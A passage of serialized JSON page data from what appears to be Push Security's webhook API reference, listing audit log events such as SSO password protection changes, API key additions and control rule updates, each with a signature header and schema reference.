Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_737"}},"schemaId":"schema_737","pointer":"/paths/sso-password-protection-mode-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"sso-password-protection-mode-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_737"}},"responseCodes":["2XX"],"pointer":"sso-password-protection-mode-updated","href":"audit/sso-password-protection-mode-updated-event","openApiOperationId":"sso-password-protection-mode-updated-event","summary":"SSO password protection mode updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_737","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_737"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/sso-password-protection-mode-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/sso-password-protection-mode-updated-event"}],"panels":[]}]},"httpPath":"sso-password-protection-mode-updated"},{"label":"SSO password protection page updated","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/sso-password-protection-page-updated-event","routeSlug":"/webhooks-v1/audit/sso-password-protection-page-updated-event","metadata":{"seo":{"title":"SSO password protection page updated","description":"An admin user has updated the page settings of the SSO password protection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"sso-password-protection-page-updated-event","name":"SSO password protection page updated","deprecated":true,"isWebhook":true,"pointer":"/paths/sso-password-protection-page-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SSO password protection page updated","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated the page settings of the SSO password protection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/sso-password-protection-page-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_738"}},"schemaId":"schema_738","pointer":"/paths/sso-password-protection-page-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"sso-password-protection-page-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_738"}},"responseCodes":["2XX"],"pointer":"sso-password-protection-page-updated","href":"audit/sso-password-protection-page-updated-event","openApiOperationId":"sso-password-protection-page-updated-event","summary":"SSO password protection page updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_738","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_738"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/sso-password-protection-page-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/sso-password-protection-page-updated-event"}],"panels":[]}]},"httpPath":"sso-password-protection-page-updated"},{"label":"SSO password protection URL masking toggled","deprecated":true,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/sso-password-protection-url-masking-toggled-event","routeSlug":"/webhooks-v1/audit/sso-password-protection-url-masking-toggled-event","metadata":{"seo":{"title":"SSO password protection URL masking toggled","description":"An admin user has toggled the password protection URL masking setting."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"sso-password-protection-url-masking-toggled-event","name":"SSO password protection URL masking toggled","deprecated":true,"isWebhook":true,"pointer":"/paths/sso-password-protection-url-masking-toggled-event/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"SSO password protection URL masking toggled","isWebhook":true,"deprecated":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has toggled the password protection URL masking setting."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/sso-password-protection-url-masking-toggled-event/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_739"}},"schemaId":"schema_739","pointer":"/paths/sso-password-protection-url-masking-toggled-event/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"sso-password-protection-url-masking-toggled-event","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_739"}},"responseCodes":["2XX"],"pointer":"sso-password-protection-url-masking-toggled-event","href":"audit/sso-password-protection-url-masking-toggled-event","openApiOperationId":"sso-password-protection-url-masking-toggled-event","summary":"SSO password protection URL masking toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_739","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_739"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/sso-password-protection-url-masking-toggled-event/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/sso-password-protection-url-masking-toggled-event"}],"panels":[]}]},"httpPath":"sso-password-protection-url-masking-toggled-event"}],"content":{"contentType":"group","meta":{"name":"Audit"},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Audit","showPageActions":true},{"nodeType":"markdoc","content":"Audit log events."}],"panels":[{"children":[{"kind":"group-items","title":"Webhooks","titleTranslationKey":"webhooks","items":[{"title":"account-login-method-removed","summary":"Account login method removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/account-login-method-removed-event","deprecated":false},{"title":"admin-accepted-invitation","summary":"Admin accepted invitation","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/admin-accepted-invitation-event","deprecated":false},{"title":"admin-enabled-mfa","summary":"Admin enabled MFA","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/admin-enabled-mfa-event","deprecated":false},{"title":"admin-exported-data","summary":"Admin exported data","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/admin-exported-data-event","deprecated":false},{"title":"admin-loaded-data","summary":"Admin loaded data","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/admin-loaded-data-event","deprecated":false},{"title":"admin-logged-in","summary":"Admin logged in","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/admin-logged-in-event","deprecated":false},{"title":"admin-removed","summary":"Admin removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/admin-removed-event","deprecated":false},{"title":"admin-role-updated","summary":"Admin role updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/admin-role-updated-event","deprecated":false},{"title":"api-key-added","summary":"API key added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/api-key-added-event","deprecated":false},{"title":"api-key-removed","summary":"API key removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/api-key-removed-event","deprecated":false},{"title":"app-approval-status-updated","summary":"App approval status updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/app-approval-status-updated-event","deprecated":false},{"title":"app-labels-added","summary":"App labels added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/app-labels-added-event","deprecated":false},{"title":"app-labels-removed","summary":"App labels removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/app-labels-removed-event","deprecated":false},{"title":"app-notes-updated","summary":"App notes updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/app-notes-updated-event","deprecated":false},{"title":"app-owner-id-updated","summary":"App owner ID updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/app-owner-id-updated-event","deprecated":false},{"title":"app-sensitivity-level-updated","summary":"App sensitivity level updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/app-sensitivity-level-updated-event","deprecated":false},{"title":"auto-licensing-toggled","summary":"Auto-licensing toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/auto-licensing-toggled-event","deprecated":false},{"title":"automatic-unlicensing-configuration-updated","summary":"Auto-unlicensing configuration updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/automatic-unlicensing-configuration-updated-event","deprecated":false},{"title":"blocked-urls-added","summary":"Blocked URLs added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/blocked-urls-added-event","deprecated":false},{"title":"blocked-urls-removed","summary":"Blocked URLs removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/blocked-urls-removed-event","deprecated":false},{"title":"blocked-urls-url-schema-obfuscation-toggled","summary":"Blocked URLs URL schema obfuscation toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/blocked-urls-url-schema-obfuscation-toggled-event","deprecated":false},{"title":"browser-extension-enumeration-toggled","summary":"Browser extension enumeration toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/browser-extension-enumeration-toggled-event","deprecated":false},{"title":"clipboard-custom-regex-pattern-added","summary":"Clipboard custom regex pattern added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/clipboard-custom-regex-pattern-added-event","deprecated":false},{"title":"clipboard-custom-regex-pattern-removed","summary":"Clipboard blocking regex pattern removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/clipboard-blocking-regex-pattern-removed-event","deprecated":false},{"title":"cloned-login-page-detection-ignored-domains-added","summary":"Cloned login page detection ignored domains added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/cloned-login-page-detection-ignored-domains-added-event","deprecated":false},{"title":"cloned-login-page-detection-ignored-domains-removed","summary":"Cloned login page detection ignored domains removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/cloned-login-page-detection-ignored-domains-removed-event","deprecated":false},{"title":"control-rule-added","summary":"Control rule added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/control-rule-added-event","deprecated":false},{"title":"control-rule-updated","summary":"Control rule updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/control-rule-updated-event","deprecated":false},{"title":"control-rule-removed","summary":"Control rule removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/control-rule-removed-event","deprecated":false},{"title":"control-rule-toggled","summary":"Control rule toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/control-rule-toggled-event","deprecated":false},{"title":"control-rule-reordered","summary":"Control rule reordered","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/control-rule-reordered-event","deprecated":false},{"title":"custom-detection-created","summary":"Custom detection created","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/custom-detection-created-event","deprecated":false},{"title":"custom-detection-removed","summary":"Custom detection removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/custom-detection-removed-event","deprecated":false},{"title":"custom-detection-updated","summary":"Custom detection configuration updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/custom-detection-updated-event","deprecated":false},{"title":"custom-login-url-added","summary":"Custom login URL added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/custom-login-url-added-event","deprecated":false},{"title":"custom-login-url-removed","summary":"Custom login URL removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/custom-login-url-removed-event","deprecated":false},{"title":"data-retention-configuration-updated","summary":"Data retention configuration updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/data-retention-configuration-updated-event","deprecated":false},{"title":"detection-archived","summary":"Detection archive status updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/detection-archive-status-updated-event","deprecated":false},{"title":"detection-classification-updated","summary":"Detection classification updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/detection-classification-updated-event","deprecated":false},{"title":"detection-screenshots-toggled","summary":"Detection screenshots toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/detection-screenshots-toggled-event","deprecated":false},{"title":"domain-category-blocking-ignored-domains-added","summary":"Domain category blocking ignored domains added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/domain-category-blocking-ignored-domains-added-event","deprecated":false},{"title":"domain-category-blocking-ignored-domains-removed","summary":"Domain category blocking ignored domains removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/domain-category-blocking-ignored-domains-removed-event","deprecated":false},{"title":"domain-enrichment-toggled","summary":"Domain enrichment toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/domain-enrichment-toggled-event","deprecated":false},{"title":"employee-added-to-group","summary":"Employees added to group","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/employees-added-to-group-event","deprecated":false},{"title":"employee-disabled-extension","summary":"Employee disabled extension","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/employee-disabled-extension-event","deprecated":false},{"title":"excluded-extension-domains-added","summary":"Excluded extension domains added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/excluded-extension-domains-added-event","deprecated":false},{"title":"extended-audit-logs-toggled","summary":"Extended audit logging toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/extended-audit-logs-toggled-event","deprecated":false},{"title":"excluded-extension-domains-removed","summary":"Excluded extension domains removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/excluded-extension-domains-removed-event","deprecated":false},{"title":"extension-branding-logo-uploaded","summary":"Extension branding logo uploaded","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/extension-branding-logo-uploaded-event","deprecated":false},{"title":"extension-branding-updated","summary":"Extension branding updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/extension-branding-updated-event","deprecated":false},{"title":"employee-email-updated","summary":"Employee email updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/employee-email-updated-event","deprecated":false},{"title":"employee-name-updated","summary":"Employee name updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/employee-name-updated-event","deprecated":false},{"title":"employee-removed-from-group","summary":"Employee removed from group","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/employee-removed-from-group-event","deprecated":false},{"title":"employees-merged","summary":"Employees merged","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/employees-merged-event","deprecated":false},{"title":"employees-unmerged","summary":"Employees unmerged","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/employees-unmerged-event","deprecated":false},{"title":"integration-added","summary":"Integration added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/integration-added-event","deprecated":false},{"title":"integration-completed","summary":"Integration completed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/integration-completed-event","deprecated":false},{"title":"integration-removed","summary":"Integration removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/integration-removed-event","deprecated":false},{"title":"label-updated","summary":"Label updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/label-updated-event","deprecated":false},{"title":"label-removed","summary":"Label removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/label-removed-event","deprecated":false},{"title":"leaked-password-check-toggled","summary":"Leaked password check toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/leaked-password-check-toggled-event","deprecated":false},{"title":"license-assigned","summary":"License assigned","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/license-assigned-event","deprecated":false},{"title":"license-removed","summary":"License removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/license-removed-event","deprecated":false},{"title":"malicious-browser-extension-detection-excluded-extensions-added","summary":"Malicious browser extension detection excluded extensions added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/malicious-browser-extension-detection-excluded-extensions-added-event","deprecated":false},{"title":"malicious-browser-extension-detection-excluded-extensions-removed","summary":"Malicious browser extension detection excluded extensions removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/malicious-browser-extension-detection-excluded-extensions-removed-event","deprecated":false},{"title":"malicious-copy-paste-detection-ignored-domains-added","summary":"Malicious copy paste detection ignored domains added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/malicious-copy-paste-detection-ignored-domains-added-event","deprecated":false},{"title":"malicious-copy-paste-detection-ignored-domains-removed","summary":"Malicious copy paste detection ignored domains removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/malicious-copy-paste-detection-ignored-domains-removed-event","deprecated":false},{"title":"mfa-tracking-exclusions-updated","summary":"MFA tracking exclusions updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/mfa-tracking-exclusions-updated","deprecated":false},{"title":"monitor-all-domains-toggled","summary":"Monitor all domains toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/monitor-all-domains-toggled-event","deprecated":false},{"title":"monitored-domains-added","summary":"Monitored domains added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/monitored-domains-added-event","deprecated":false},{"title":"monitored-domains-removed","summary":"Monitored domains removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/monitored-domains-removed-event","deprecated":false},{"title":"oauth-app-approval-status-updated","summary":"OAuth app approval status updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/oauth-app-approval-status-updated-event","deprecated":false},{"title":"password-protection-hide-urls-toggled","summary":"Password protection URL masking toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/password-protection-hide-urls-toggled-event","deprecated":false},{"title":"password-protection-ignore-work-apps-toggled","summary":"Password protection ignore work apps toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/password-protection-ignore-work-apps-toggled-event","deprecated":false},{"title":"password-protection-ignored-domains-added","summary":"Password protection ignored domains added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/password-protection-ignored-domains-added-event","deprecated":false},{"title":"password-protection-ignored-domains-removed","summary":"Password protection ignored domains removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/password-protection-ignored-domains-removed-event","deprecated":false},{"title":"phishing-tool-detection-ignored-domains-added","summary":"Phishing tool detection ignored domains added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/phishing-tool-detection-ignored-domains-added-event","deprecated":false},{"title":"phishing-tool-detection-ignored-domains-removed","summary":"Phishing tool detection ignored domains removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/phishing-tool-detection-ignored-domains-removed-event","deprecated":false},{"title":"reused-password-finding-exceptions-updated","summary":"Reused password exceptions updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/reused-password-exceptions-updated","deprecated":false},{"title":"saml-sso-added-event","summary":"SAML SSO added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/saml-sso-added-event","deprecated":false},{"title":"saml-sso-completed-event","summary":"SAML SSO completed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/saml-sso-completed-event","deprecated":false},{"title":"saml-sso-default-role-updated-event","summary":"SAML SSO default role updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/saml-sso-default-role-updated-event","deprecated":false},{"title":"session-theft-domains-added","summary":"Session theft domains added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/session-theft-domains-added-event","deprecated":false},{"title":"session-theft-domains-removed","summary":"Session theft domains removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/session-theft-domains-removed-event","deprecated":false},{"title":"session-theft-marker-rotated","summary":"Session theft marker rotated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/session-theft-marker-rotated-event","deprecated":false},{"title":"stolen-credentials-added","summary":"Stolen credentials added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/stolen-credentials-added-event","deprecated":false},{"title":"stolen-credentials-removed","summary":"Stolen credentials removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/stolen-credentials-removed-event","deprecated":false},{"title":"stolen-credentials-mode-updated","summary":"Stolen credentials mode updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/stolen-credentials-mode-updated-event","deprecated":false},{"title":"telemetry-rule-added","summary":"Telemetry rule added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/telemetry-rule-added-event","deprecated":false},{"title":"telemetry-rule-updated","summary":"Telemetry rule updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/telemetry-rule-updated-event","deprecated":false},{"title":"telemetry-rule-removed","summary":"Telemetry rule removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/telemetry-rule-removed-event","deprecated":false},{"title":"telemetry-rule-toggled","summary":"Telemetry rule toggled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/telemetry-rule-toggled-event","deprecated":false},{"title":"telemetry-rule-reordered","summary":"Telemetry rule reordered","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/telemetry-rule-reordered-event","deprecated":false},{"title":"unsupported-app-support-requested","summary":"Unsupported app support requested","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/unsupported-app-support-requested-event","deprecated":false},{"title":"unsupported-app-support-request-cancelled","summary":"Unsupported app support request cancelled","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/unsupported-app-support-request-cancelled-event","deprecated":false},{"title":"url-block-page-updated","summary":"URL block page updated","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/url-block-page-updated-event","deprecated":false},{"title":"weak-password-custom-words-added","summary":"Weak password custom words added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/weak-password-custom-words-added-event","deprecated":false},{"title":"weak-password-custom-words-removed","summary":"Weak password custom words removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/weak-password-custom-words-removed-event","deprecated":false},{"title":"webhook-added","summary":"Webhook added","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/webhook-added-event","deprecated":false},{"title":"webhook-removed","summary":"Webhook removed","prefix":{"name":"post","color":"post"},"badges":[],"link":"/audit/webhook-removed-event","deprecated":false},{"title":"app-banner-configured","summary":"App banner configured","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/app-banner-configured-event","deprecated":true},{"title":"app-banner-enabled","summary":"App banner enabled","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/app-banner-enabled-event","deprecated":true},{"title":"mfa-enforcement-apps-updated","summary":"MFA enforcement apps updated","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/mfa-enforcement-apps-updated-event","deprecated":true},{"title":"mfa-enforcement-settings-updated","summary":"MFA enforcement settings updated","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/mfa-enforcement-settings-updated-event","deprecated":true},{"title":"phishing-tool-detection-page-updated","summary":"Phishing tool detection page updated","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/phishing-tool-detection-page-updated-event","deprecated":true},{"title":"phishing-tool-detection-mode-updated","summary":"Phishing tool detection mode updated","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/phishing-tool-detection-mode-updated-event","deprecated":true},{"title":"sso-password-protection-ignored-domains-added","summary":"SSO password protection ignored domains added","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/sso-password-protection-ignored-domains-added-event","deprecated":true},{"title":"sso-password-protection-ignored-domains-removed","summary":"SSO password protection ignored domains removed","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/sso-password-protection-ignored-domains-removed-event","deprecated":true},{"title":"sso-password-protection-ignore-work-apps-toggled","summary":"SSO password protection ignore work apps toggled","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/sso-password-protection-ignore-work-apps-toggled-event","deprecated":true},{"title":"sso-password-protection-mode-updated","summary":"SSO password protection mode updated","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/sso-password-protection-mode-updated-event","deprecated":true},{"title":"sso-password-protection-page-updated","summary":"SSO password protection page updated","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/sso-password-protection-page-updated-event","deprecated":true},{"title":"sso-password-protection-url-masking-toggled-event","summary":"SSO password protection URL masking toggled","prefix":{"name":"post","color":"http-deprecated"},"badges":[],"link":"/audit/sso-password-protection-url-masking-toggled-event","deprecated":true}]}]}]}]}},{"type":"group","label":"Controls","link":"/webhooks-v1/controls","routeSlug":"/webhooks-v1/controls","items":[{"label":"App banner","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/app-banner-event","routeSlug":"/webhooks-v1/controls/app-banner-event","metadata":{"seo":{"title":"App banner","description":"App banner"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-banner-event","name":"App banner","isWebhook":true,"pointer":"/paths/app-banner/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App banner","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app-banner/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_740"}},"schemaId":"schema_740","pointer":"/paths/app-banner/post/requestBody","description":"An app banner event was detected."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app-banner","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_740"}},"responseCodes":["2XX"],"pointer":"app-banner","href":"controls/app-banner-event","openApiOperationId":"app-banner-event","summary":"App banner"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_740","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_740"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app-banner/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/app-banner-event"}],"panels":[]}]},"httpPath":"app-banner"},{"label":"Blocked URL visited","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/blocked-url-visited-event","routeSlug":"/webhooks-v1/controls/blocked-url-visited-event","metadata":{"seo":{"title":"Blocked URL visited","description":"Blocked URL visited"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"blocked-url-visited-event","name":"Blocked URL visited","isWebhook":true,"pointer":"/paths/blocked-url-visited/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Blocked URL 